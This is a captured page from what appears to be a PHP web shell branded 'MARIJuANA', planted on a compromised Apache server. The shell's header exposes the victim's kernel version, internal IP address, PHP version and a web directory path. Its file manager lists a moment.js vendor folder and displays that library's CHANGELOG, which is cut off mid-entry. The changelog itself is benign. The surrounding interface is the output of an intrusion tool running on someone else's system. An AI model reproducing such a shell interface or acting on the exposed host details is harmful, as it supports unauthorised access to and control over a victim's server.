MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux ip-172-26-15-81 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
  SOFT : Apache/2.4.41 (Ubuntu) PHP : 7.4.3-4ubuntu2.29
/var/www/studentcon/manage/vendors/moment/
172.26.15.81

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
locale dir drwxr-xr-x 2018-08-01 01:23 R D
min dir drwxr-xr-x 2018-08-01 01:23 R D
src dir drwxr-xr-x 2018-08-01 01:23 R D
templates dir drwxr-xr-x 2018-08-01 01:23 R D
.bower.json 0.67 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
CHANGELOG.md 24.889 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
LICENSE 1.071 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
README.md 2.856 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
bower.json 0.349 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
moment.d.ts 15.562 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
moment.js 131.744 KB -rwxr-xr-x 2018-03-31 02:38 R E G D
REQUEST EXIT
Changelog ========= ### 2.13.0 [See full changelog](https://gist.github.com/ichernev/0132fcf5b61f7fc140b0bb0090480d49) ## Enhancements: * [#2982](https://github.com/moment/moment/pull/2982) Add 'date' as alias to 'day' for startOf() and endOf(). * [#2955](https://github.com/moment/moment/pull/2955) Add parsing negative components in durations when ISO 8601 * [#2991](https://github.com/moment/moment/pull/2991) isBetween support for both open and closed intervals * [#3105](https://github.com/moment/moment/pull/3105) Add localeSorted argument to weekday listers * [#3102](https://github.com/moment/moment/pull/3102) Add k and kk formatting tokens ## Bugfixes * [#3109](https://github.com/moment/moment/pull/3109) Fix [#1756](https://github.com/moment/moment/issues/1756) Resolved thread-safe issue on server side. * [#3078](https://github.com/moment/moment/pull/3078) Fix parsing for months/weekdays with weird characters * [#3098](https://github.com/moment/moment/pull/3098) Use Z suffix when in UTC mode ([#3020](https://github.com/moment/moment/issues/3020)) * [#2995](https://github.com/moment/moment/pull/2995) Fix floating point rounding errors in durations * [#3059](https://github.com/moment/moment/pull/3059) fix bug where diff returns -0 in month-related diffs * [#3045](https://github.com/moment/moment/pull/3045) Fix mistaking any input for 'a' token * [#2877](https://github.com/moment/moment/pull/2877) Use explicit .valueOf() calls instead of coercion * [#3036](https://github.com/moment/moment/pull/3036) Year setter should keep time when DST changes Plus 3 new locales and locale fixes. ### 2.12.0 [See full changelog](https://gist.github.com/ichernev/6e5bfdf8d6522fc4ac73) ## Enhancements: * [#2932](https://github.com/moment/moment/pull/2932) List loaded locales * [#2818](https://github.com/moment/moment/pull/2818) Parse ISO-8061 duration containing both day and week values * [#2774](https://github.com/moment/moment/pull/2774) Implement locale inheritance and locale updating ## Bugfixes: * [#2970](https://github.com/moment/moment/pull/2970) change add subtract to handle decimal values by rounding * [#2887](https://github.com/moment/moment/pull/2887) Fix toJSON casting of invalid moment * [#2897](https://github.com/moment/moment/pull/2897) parse string arguments for month() correctly, closes #2884 * [#2946](https://github.com/moment/moment/pull/2946) Fix usage suggestions for min and max ## New locales: * [#2917](https://github.com/moment/moment/pull/2917) Locale Punjabi(Gurmukhi) India format conversion And more ### 2.11.2 (Fix ReDoS attack vector) * [#2939](https://github.com/moment/moment/pull/2939) use full-string match to speed up aspnet regex match ### 2.11.1 [See full changelog](https://gist.github.com/ichernev/8ec3ee25b749b4cff3c2) ## Bugfixes: * [#2881](https://github.com/moment/moment/pull/2881) Revert "Merge pull request #2746 from mbad0la:develop" Sep->Sept * [#2868](https://github.com/moment/moment/pull/2868) Add format and parse token Y, so it actually works * [#2865](https://github.com/moment/moment/pull/2865) Use typeof checks for undefined for global variables * [#2858](https://github.com/moment/moment/pull/2858) Fix Date mocking regression introduced in 2.11.0 * [#2864](https://github.com/moment/moment/pull/2864) Include changelog in npm release * [#2830](https://github.com/moment/moment/pull/2830) dep: add grunt-cli * [#2869](https://github.com/moment/moment/pull/2869) Fix months parsing for some locales ### 2.11.0 [See full changelog](https://gist.github.com/ichernev/6594bc29719dde6b2f66) * [#2624](https://github.com/moment/moment/pull/2624) Proper handling of invalid moments * [#2634](https://github.com/moment/moment/pull/2634) Fix strict month parsing issue in cs,ru,sk * [#2735](https://github.com/moment/moment/pull/2735) Reset the locale back to 'en' after defining all locales in min/locales.js * [#2702](https://github.com/moment/moment/pull/2702) Week rework * [#2746](https://github.com/moment/moment/pull/2746) Changed September Abbreviation to "Sept" in locale-specific english files and default locale file * [#2646](https://github.com/moment/moment/pull/2646) Fix [#2645](https://github.com/moment/moment/pull/2645) - invalid dates pre-1970 * [#2641](https://github.com/moment/moment/pull/2641) Implement basic format and comma as ms separator in ISO 8601 * [#2665](https://github.com/moment/moment/pull/2665) Implement stricter weekday parsing * [#2700](https://github.com/moment/moment/pull/2700) Add [Hh]mm and [Hh]mmss formatting tokens, so you can parse 123 with hmm for example * [#2565](https://github.com/moment/moment/pull/2565) [#2835](https://github.com/moment/moment/pull/2835) Expose arguments used for moment creation with creationData (fix [#2443](https://github.com/moment/moment/pull/2443)) * [#2648](https://github.com/moment/moment/pull/2648) fix issue [#2640](https://github.com/moment/moment/pull/2640): support instanceof operator * [#2709](https://github.com/moment/moment/pull/2709) Add isSameOrAfter and isSameOrBefore comparison methods * [#2721](https://github.com/moment/moment/pull/2721) Fix moment creation from object with strings values * [#2740](https://github.com/moment/moment/pull/2740) Enable 'd hh:mm:ss.sss' format for durations * [#2766](https://github.com/moment/moment/pull/2766) [#2833](https://github.com/moment/moment/pull/2833) Alternate Clock Source Support ### 2.10.6 [#2515](https://github.com/moment/moment/pull/2515) Fix regression introduced in `2.10.5` related to `moment.ISO_8601` parsing. ### 2.10.5 [See full changelog](https://gist.github.com/ichernev/6ec13ac7efc396da44b2) Important changes: * [#2357](https://github.com/moment/moment/pull/2357) Improve unit bubbling for ISO dates this fixes day to year conversions to work around end-of-year (~365 days). As a side effect 365 days is 11 months and 30 days, and 366 days is one year. * [#2438](https://github.com/moment/moment/pull/2438) Fix inconsistent moment.min and moment.max results Return invalid result if any of the inputs is invalid * [#2494](https://github.com/moment/moment/pull/2494) Fix two digit year parsing with YYYY format This brings the benefits of YY to YYYY * [#2368](https://github.com/moment/moment/pull/2368) perf: use faster form of copying dates, across the board improvement ### 2.10.3 [See full changelog](https://gist.github.com/ichernev/f264b9bed5b00f8b1b7f) * add `moment.fn.to` and `moment.fn.toNow` (similar to `from` and `fromNow`) * new locales (Sinhalese (si), Montenegrin (me), Javanese (ja)) * performance improvements ### 2.10.2 * fixed moment-with-locales in browser env caused by esperanto change ### 2.10.1 * regression: Add moment.duration.fn back ### 2.10.0 Ported code to es6 modules. ### 2.9.0 [See full changelog](https://gist.github.com/ichernev/0c9a9b49951111a27ce7) languages: * [2104](https://github.com/moment/moment/issues/2104) Frisian (fy) language file with unit test * [2097](https://github.com/moment/moment/issues/2097) add ar-tn locale deprecations: * [2074](https://github.com/moment/moment/issues/2074) Implement `moment.fn.utcOffset`, deprecate `moment.fn.zone` features: * [2088](https://github.com/moment/moment/issues/2088) add moment.fn.isBetween * [2054](https://github.com/moment/moment/issues/2054) Call updateOffset when creating moment (needed for default timezone in moment-timezone) * [1893](https://github.com/moment/moment/issues/1893) Add moment.isDate method * [1825](https://github.com/moment/moment/issues/1825) Implement toJSON function on Duration * [1809](https://github.com/moment/moment/issues/1809) Allowing moment.set() to accept a hash of units * [2128](https://github.com/moment/moment/issues/2128) Add firstDayOfWeek, firstDayOfYear locale getters * [2131](https://github.com/moment/moment/issues/2131) Add quarter diff support Some bugfixes and language improvements -- [full changelog](https://gist.github.com/ichernev/0c9a9b49951111a27ce7) ### 2.8.4 [See full changelog](https://gist.github.com/ichernev/a4fcb0a46d74e4b9b996) Features: * [#2000](https://github.com/moment/moment/issues/2000) Add LTS localised format that includes seconds * [#1960](https://github.com/moment/moment/issues/1960) added formatToken 'x' for unix offset in milliseconds #1938 * [#1965](https://github.com/moment/moment/issues/1965) Support 24:00:00.000 to mean next day, at midnight. * [#2002](https://github.com/moment/moment/issues/2002) Accept 'date' key when creating moment with object * [#2009](https://github.com/moment/moment/issues/2009) Use native toISOString when we can Some bugfixes and language improvements -- [full changelog](https://gist.github.com/ichernev/a4fcb0a46d74e4b9b996) ### 2.8.3 Bugfixes: * [#1801](https://github.com/moment/moment/issues/1801